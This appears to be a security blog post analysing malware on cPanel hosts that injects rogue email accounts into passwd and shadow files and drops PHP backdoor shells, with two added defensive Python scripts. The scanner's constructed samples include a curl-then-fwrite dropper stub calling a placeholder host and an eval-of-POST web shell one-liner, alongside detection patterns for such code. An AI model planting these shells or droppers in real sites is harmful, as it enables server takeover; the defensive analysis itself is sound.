Reset Email Account Passwords after Website Infection: Follow Up


In a previous analysis of a malicious file, we demonstrated why you should always update your email account passwords after a security compromise.

The information security threat landscape is always changing, and the tools used by bad actors evolve with it to evade detection by IDS/IPS and similar services.

cPanel Hosting Environment File Analysis

In our past post, we analyzed a file that modified the passwords of existing email accounts by editing the per-domain shadow file, /home/user/etc/domain.com/shadow. In cPanel hosting environments, this file holds the password hashes for the email accounts that belong to a specific domain under a cPanel username.

But what if a hacker wishes to add new email accounts instead of just modifying existing email account passwords?

This new scenario requires the attacker to modify both /home/user/etc/domain.com/shadow and /home/user/etc/domain.com/passwd. The passwd file lists each email account together with its mail directory, and the shadow file holds its password hash, so a brand-new account needs an entry in both files before the mail server will accept logins for it.

Email Accounts & Variables Injected into Shadow Files

A recent variation shows the attacker using variables that hold hardcoded email account usernames along with their associated mail directories and passwords.

Injected emails in shadow files (screenshot)
infos@domain.com and hussam@domain.com are just some of the new email accounts injected into the /home/user/etc/domain.com/passwd and /home/user/etc/domain.com/shadow files.
Injected variables in passwd and shadow files (screenshot)
The data from the $hm and $wr variables is written into the passwd and shadow files respectively. This is essentially manual email account creation that bypasses the cPanel interface, so the new accounts never appear in cPanel's own activity logs.
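Because these accounts are written straight into the two files rather than created through cPanel, the quickest way to find them is to read the files back and compare them against what the site owner actually created. The script below is an added example for this post, not code from the original analysis or from cPanel. It assumes the standard cPanel layout /home/<user>/etc/<domain>/passwd and /home/<user>/etc/<domain>/shadow, with passwd lines in the usual colon-separated form (account, "x", uid, gid, gecos, maildir, shell) and shadow lines beginning (account, password-hash, ...). The sample lines, the placeholder hashes and the approved-account baseline are all constructed for the example.

```python
"""Audit the cPanel mail account files for one domain and flag accounts that
were not created through cPanel.

Added example, not code from the original post or from cPanel. Assumes the
standard per-domain layout /home/<user>/etc/<domain>/{passwd,shadow}. The
sample data below is constructed; the hashes are placeholders.
"""
import re

CPANEL_USER = "user"
DOMAIN = "domain.com"

# Constructed sample passwd file: two legitimate accounts, then two entries
# mirroring the injected infos@ and hussam@ accounts named in the post.
SAMPLE_PASSWD = """\
sales:x:1001:1001:domain.com:/home/user/mail/domain.com/sales:/usr/local/cpanel/bin/noshell
admin:x:1001:1001:domain.com:/home/user/mail/domain.com/admin:/usr/local/cpanel/bin/noshell
infos:x:1001:1001:domain.com:/home/user/mail/domain.com/infos:/usr/local/cpanel/bin/noshell
hussam:x:1001:1001:domain.com:/home/user/mail/domain.com/hussam:/usr/local/cpanel/bin/noshell
"""

# Constructed sample shadow file (placeholder hashes, not real crypt output).
# "ghost" exists only here: the kind of inconsistency a hand-written
# injection leaves behind when the two files are edited separately.
SAMPLE_SHADOW = """\
sales:$6$salt$PLACEHOLDER_sales:18000:0:99999:7:::
admin:$6$salt$PLACEHOLDER_admin:18000:0:99999:7:::
infos:$6$salt$PLACEHOLDER_infos:18000:0:99999:7:::
hussam:$6$salt$PLACEHOLDER_hussam:18000:0:99999:7:::
ghost:$6$salt$PLACEHOLDER_ghost:18000:0:99999:7:::
"""


def parse_colon_file(text):
    """Return {account: fields} for a passwd- or shadow-style file."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def audit_mail_accounts(passwd_text, shadow_text, approved,
                        cpanel_user=CPANEL_USER, domain=DOMAIN):
    """Return a sorted list of (account, reason) findings.

    approved: the set of account names the site owner actually created
    (assumed to come from the owner's own records, not from the files).
    """
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    # A cPanel-created account's maildir is /home/<user>/mail/<domain>/<account>.
    maildir_re = re.compile(
        rf"^/home/{re.escape(cpanel_user)}/mail/{re.escape(domain)}/([^/]+)$")
    findings = []
    for name in sorted(set(passwd) | set(shadow)):
        if name not in approved:
            findings.append((name, "not in approved baseline"))
        if name not in shadow:
            findings.append((name, "passwd entry without shadow entry"))
        if name not in passwd:
            findings.append((name, "shadow entry without passwd entry"))
            continue
        fields = passwd[name]
        if len(fields) != 7:
            findings.append((name, "malformed passwd entry"))
            continue
        m = maildir_re.match(fields[5])
        if not m or m.group(1) != name:
            findings.append((name, "maildir does not match account"))
    return findings


def audit_domain(cpanel_user, domain, approved):
    """Audit the live files for one domain (needs read access to the home dir)."""
    base = f"/home/{cpanel_user}/etc/{domain}"
    with open(f"{base}/passwd") as f_p, open(f"{base}/shadow") as f_s:
        return audit_mail_accounts(f_p.read(), f_s.read(), approved,
                                   cpanel_user, domain)


if __name__ == "__main__":
    for account, reason in audit_mail_accounts(
            SAMPLE_PASSWD, SAMPLE_SHADOW, approved={"sales", "admin"}):
        print(f"{account}@{DOMAIN}: {reason}")
```

Run against the constructed sample it reports infos, hussam and ghost as outside the baseline, and additionally reports ghost as a shadow-only entry. On a real server, run audit_domain() for every domain under the account and delete or reset anything it flags; an account you do not recognise is an attacker's mailbox even if its password has since been changed.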

PHP Backdoor Shell Dropper

Some of the other "improvements" made to the malicious file include the generation of multiple PHP backdoor shells in the website's document root. The file also sends out information (at the attacker's discretion) about any newly created email addresses.

PHP backdoor shells in document root

Interestingly enough, the hacker uploads three different PHP shells (wso, mini, and idbv2) and uses PHP's curl functions to fetch the body of an HTTP response. The received output is then written into one of the predefined files (e.g. include.php, kontol.php) using fwrite.

fwrite function and curl request for php backdoor
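The dropper described above has two recognisable traits on disk: the dropper itself pairs a curl fetch with a write to a PHP file, and the files it drops typically evaluate decoded or request-supplied input. The scanner below is an added example for this post, not code from the original analysis or from any commercial scanner. The indicator regexes are assumed heuristics chosen for the example, the sample files written by build_sample_docroot() are constructed, and the URL inside the sample dropper is a placeholder that is never contacted.

```python
"""Scan a website document root for PHP files with dropper and backdoor traits.

Added example, not code from the original post. INDICATORS are assumed
heuristics; SAMPLE_FILES are constructed test inputs.
"""
import os
import re
import tempfile

# Each indicator fires only when every pattern in its list appears in the file.
INDICATORS = {
    # The curl-then-fwrite flow the post describes for the dropper.
    "remote_fetch_to_disk": [
        re.compile(r"\bcurl_exec\s*\("),
        re.compile(r"\b(fwrite|file_put_contents)\s*\("),
    ],
    # Obfuscated payload executed at runtime, common in dropped shells.
    "eval_of_decoded_input": [
        re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    ],
    # Code supplied directly in the HTTP request.
    "eval_of_request": [
        re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    ],
    "command_execution": [
        re.compile(r"\b(system|passthru|shell_exec|proc_open|popen)\s*\("),
    ],
}


def scan_source(source):
    """Return the sorted indicator names that match one PHP source text."""
    return sorted(name for name, patterns in INDICATORS.items()
                  if all(p.search(source) for p in patterns))


def scan_docroot(root):
    """Walk root and return {relative path: [indicators]} for flagged PHP files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml", ".php5", ".php7")):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                found = scan_source(f.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


# Constructed sample files: a benign index, a dropper mirroring the post's
# curl-then-fwrite flow, a stand-in for a dropped shell, and the classic
# eval-of-POST one-liner hidden in an uploads directory.
SAMPLE_FILES = {
    "index.php": "<?php echo 'site is up'; ?>\n",
    "dropper.php": """<?php
$ch = curl_init("http://example.invalid/payload.txt");  // placeholder, never fetched
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec($ch);
$fh = fopen(__DIR__ . "/include.php", "w");
fwrite($fh, $out);
fclose($fh);
""",
    "include.php": "<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n",
    "uploads/image.php": "<?php @eval($_POST['cmd']); ?>\n",
}


def build_sample_docroot():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="docroot-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    for rel, found in sorted(scan_docroot(build_sample_docroot()).items()):
        print(f"{rel}: {', '.join(found)}")
```

Pointing scan_docroot() at a real document root (e.g. /home/user/public_html) lists every PHP file that trips an indicator; the benign index.php is not reported. Treat the output as a triage list rather than a verdict: legitimate plugins occasionally use curl and file writes together, but a file doing so under a name like include.php or kontol.php in the web root deserves a manual look.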

From the file's code, it looks like whoever created this malicious file simply added new features to the existing code sample analyzed in our last post. Even the variable names remain the same; only the password changes.

Conclusion

Our server-side scanning and cleanup tools immediately identified this file’s malicious nature. In addition, the code “improvements” did nothing to help it evade our detection.

It is always important to reset every password associated with your hosting environment after a website compromise, including every email account. Credentials for your domain, FTP, SFTP, cPanel, Plesk, CMS dashboards, and databases should all be replaced with new, strong passwords to prevent reinfection.
